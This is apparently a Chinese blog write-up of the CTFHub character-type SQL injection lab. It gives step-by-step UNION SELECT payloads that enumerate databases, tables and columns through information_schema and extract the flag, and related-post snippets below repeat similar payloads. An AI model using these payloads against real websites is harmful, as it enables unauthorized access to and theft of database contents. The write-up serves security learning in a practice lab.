ctfhub SQL字符注入

最新推荐文章于 2024-03-29 19:43:48 发布
最新推荐文章于 2024-03-29 19:43:48 发布
阅读量159 收藏
点赞数
文章标签: 学习方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74020633/article/details/133653761
版权

1.判断注入类型

按照题目要求,输入1发现有两个引号,说明是字符型注入(这是根据题目要求知道的注入类型,后面要学习判断的方法)。是字符型输入也就说明我们输入的值应该被引号包围,才能被执行

输入1 '#

2.判断数据库有几列

1' order by 1 , 2 #(这里只有两列,后面可以继续增加判断,如1' order by 1 , 2,3 #)

3.判断注入点(显示位,判断显示的信息是第几列的信息)

一般在我们可见页面中显示的信息不一定是查询全部列数,可能查询3列,显示1列。通过-1’直接闭合前面的select语句,使其前半句查询结果空(除非存在id=-1的情况),即数据库中不存在该查询数据,然后通过union select 1,2 显示的数字来确定显示的列的位置。
1为ID
2为Data
(Data也就是我们想要查询的数据)
————————————————
版权声明:本文为CSDN博主「小小大空翼」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/m0_64444909/article/details/124475643

4.查询数据库信息

查询用户

-1' union select 1 , user() #(根据查资料,用户为root,可以访问information_schema数据库

查询数据库版本

-1' union select 1 , version() #

查询数据库名称

-1' union select 1 , database() #

5.查询所有数据库名(爆库)

查询所有数据库名

-1' union select 1,group_concat(schema_name) from information_schema.schemata #

6.查询所有表名(爆表)

-1' union select table_schema, group_concat(table_name) from information_schema.tables where table_schema='sqli' #

7.查询指定数据库中指定表的字段名(爆字段名)

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'#

8.查询指定数据库中指定表的字段名的内容

-1' union select 1 , group_concat(flag) from flag #

MissAnYou
关注
CTFHUB-web-SQL注入
ookami6497的博客
11-29 850
CTFHUB SQL
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1742
CTFHub——SQL注入(报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入、Refer注入、过滤空格)
CTFHUB-技能树-Web题-SQL注入-字符注入
最新发布
Static______的博客
03-29 533
对于字符注入,可在url输入。由此判断回显字段为1,2字段。由此判断字段数为两个。
CTFHUB——字符注入
陈艺秋的博客
01-14 534
sql整数注入
CTFHub字符注入
sGanYu
07-24 3179
目录 手动注入 sqlmap注入 手动注入 注入是否为字符注入,在输入id=1的时候发现输出结果为id=’1’,判断类字符串形 需要让语句闭合,正常执行,在url结尾输入%23 或者--+,正常闭合,%23为#,注释后面的语句,一定要注意“ ' ”英文输入下,否则容易爆错 判断列数,发现是两列 库名为sqli 爆出一个news和flag两个表,开始跑列名 列名为flag ,查询列内容 【 Mysql表类:在mysql内自带一个数据库,名...
CTFHub-字符注入
m0_51589948的博客
05-19 253
字符注入 输入1,2,3 发现只有1,2回显,证明是一个两行的数据库 输入1 order 2 查询字段数 使用整形注入后发现,无法注入成功,考虑字符注入, 可得知数据库名为sqli 查询该数据库下的表名 -1‘ union select 1,group_concat(table_name) from information_schema.table where table_schema=‘sqli’# 得出表名有新闻和标志 查询flag的所有字段名 -1’ union s
CTFHub - 字符注入
Have_a_great_day的博客
09-08 830
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1141
ctfhubSQL注入的flag是动态生成的 1、整数注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5552
Ctfhub解题 web SQL注入
sql注入基础(ctfhub sql注入
kofi的博客,已停更
08-15 790
(持续更新sql注入基础0x00 前言 0x00 前言 这两天在CTFHub上练题,刚好练到了SQL注入这个之前我一直也不是很懂,这回一做发现其大有玄妙,所以就一起写个小总结。 CTFhHub:https://www.ctfhub.com/#/index 上面这张图是CTFHubSQL注入技能树 ...
CTFHUB 字符注入
qq_63875498的博客
12-04 223
CTFHUB 字符注入
CTFhub 字符注入
plant1234的博客
06-16 534
字符注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
CTFHub | 字符注入
尼泊罗河伯的博客
10-27 1564
此题目和上一题相似,一个是整数注入,一个是字符注入字符注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成。
CTFHub 字符SQL注入
Leon~博客
03-14 4302
字符SQL注入 目录 一、判断是否存在注入 二、判断select语句有几列 三、判断显示的信息是第几列的信息 四、利用函数来收集数据库信息 五、通过union查询数据库 1、获取所有数据库名称 2、查询数据库有多少个表 3、查询指定数据库的表名 4、查询指定数据库指定表的列名 5、查询指定...
CTFHub (web-SQL-字符注入)
m0_64444909的博客
04-29 2616
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 阅读目录一、limit和group_concat查询的区别二、对字符数据的解释三、实战解题步骤1.进入靶场, 一、limit和group_concat查询的区别 1.列出所有数据库 limit 一个一个打印出来库名 group_concat 一次性全部显示 2.列出(数据库: )所有的表名 limit 一个一个打印出来表名 group_concat 一次性全部显示 3.列出(数据库: 表:)所有的字段名 limit 一个.
CTFHUB-WEB-字符SQL注入
xixihahawuwu的博客
12-24 344
CTFHUB-WEB-字符SQL注入 我们先就这此题来了解下如何去判断是否是字符注入 如何去判断 1.加单引号,由于固定情况下,数据库此时的语句为select * from table where name = ‘admin’ ,加入单引号会引起报错,页面不回返 id=1' 2.加入 ?id=1' and 1=1 这里就需要加注释来进行绕过 一开始我想使用#来进行注释,结果发现被网页转码了,我们换一种注释–,为了防止再次被转码,我们在–后面加上+ id=1' and 1=1--+ 3.输入 id=
CTFHub-字符注入-wp
z1moq的博客
05-09 193
字符注入 输入1 数据正常返回 输入1+1 ​ 仍返回 ID=1 的值,说明不存在整数SQL注入漏洞 输入 ' or 1=1 # 能正常返回 ​ 所以存在以单引号闭合的字符注入 输入 1' order by 1 # 1' order by 2 # 1' order by 3 # 在值为3时无法正常显示页面 所以页面显示输出字段数为2 输入 -1' union select 1,database() # 获取数据库名 继续输入 -1' union sel
CTFHUB-WEB-SQL注入-字符注入
weixin_43486981的博客
08-10 488
题目: 靶机环境: 输入1查看显示,1被单引号引起来了 使用单引号’,提前闭合字符 求列数 求数据库名 求数据表名 求字段名 求字段值,得到flag
CTFHub笔记之技能树WEB-字符注入
weixin_48799157的博客
03-19 379
小白一个,如有错误还请各位大佬指正! 解法一:手搓 1.输入1和2都有回显,3没有回显,得知数据库只有两个字段。开始构造payload,暴个数据库看看 123' union select 1,database()# 2.发现目标 爆个表名看看 123' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli' #' 3.发现名为flag的表 冲啦兄.
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其包含了各种类的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值